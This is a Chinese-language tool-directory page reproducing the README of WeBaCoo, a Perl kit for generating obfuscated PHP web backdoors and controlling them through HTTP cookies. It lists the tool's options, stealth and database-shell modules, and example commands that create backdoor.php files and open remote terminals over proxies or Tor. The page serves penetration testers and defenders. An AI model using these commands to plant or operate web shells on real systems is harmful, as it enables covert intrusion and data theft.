Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/anestisb/webacoo
Payload生成Web安全渗透测试命令与控制红队
GitHubanestisb/webacoo

WeBaCoo

网页后门Cookie脚本套件

查看仓库
18642414年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \ \ /\ / __/ |/ / (
| | _/\ () | (_) | / / _
_/ _,|_/_/ _/

root@kitploit:~
 Web Backdoor Cookie Script-Kit

作者:Anestis Bechtsoudis @ bechtsoudis.com 版权(C)2011-2012 Anestis Bechtsoudis

免责声明

该工具仅用于测试目的,且只能在获得严格同意的情况下使用。请勿用于非法用途。

许可证

对本应用程序的任何修改、变更或改动都是允许的,但任何使用此代码的公开发布必须获得其创建者的批准。更多信息请查看LICENSE文件。

要求

  • 已安装perl
  • liburi-perl
  • libio-socket-socks-perl

如果您不想为Tor代理功能安装"libio-socket-socks-perl",请注释掉webacoo.pl中的第25行。

用法

webacoo.pl [选项]

选项: -g 生成后门代码(需要-o)

-f FUNCTION 要使用的PHP系统函数 FUNCTION 1: system (默认) 2: shell_exec 3: exec 4: passthru 5: popen

-o OUTPUT 生成的后门输出文件名

-r 返回非混淆的后门代码

-t 建立远程"终端"连接(需要-u)

-u URL 后门URL

-e CMD 单命令执行模式(需要-t和-u)

-m METHOD 使用的HTTP方法(默认为"GET")

-c C_NAME Cookie名称(默认为"M-cookie")

-d DELIM 分隔符(默认为每个请求随机生成)

-a AGENT HTTP头用户代理(默认已存在)

-p PROXY 使用代理(tor、ip:port 或 user:pass:ip:port)

-v LEVEL 详细级别 LEVEL 0: 无额外信息(默认) 1: 打印HTTP头 2: 打印HTTP头+数据

-l LOG 将活动记录到文件

-h 显示帮助并退出

update 检查更新并应用(如果有)

扩展模块

自0.2.1版本起,增加了扩展模块支持,以便为WeBaCoo提供额外功能。在终端模式下,您可以执行'load'来列出可用模块,并从列表中选择初始化所需的模块。输入'unload'可以恢复到初始终端模式。

可用扩展模块: o mysql-cli MySQL命令行模块 o psql-cli Postgres命令行模块 o upload 使用HTTP Post的文件上传模块 o download 通过stdout打印(借助'od'和'xxd')的文件下载模块 o stealth 通过.htaccess处理增强隐蔽性的模块

示例

  1. 使用默认设置创建混淆后门'backdoor.php' ./webacoo.pl -g -o backdoor.php

  2. 使用'passthru'函数创建非混淆后门'raw-backdoor.php' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

  3. 使用默认设置与远程主机建立"终端"连接 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

  4. 设置一些参数与远程主机建立"终端"连接 ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

  5. 通过本地HTTP代理与远程主机建立"终端"连接 ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

  6. 通过带基本认证的HTTP代理与远程主机建立"终端"连接 ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

  7. 通过Tor与远程主机建立"终端"连接并记录活动 ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

下载工具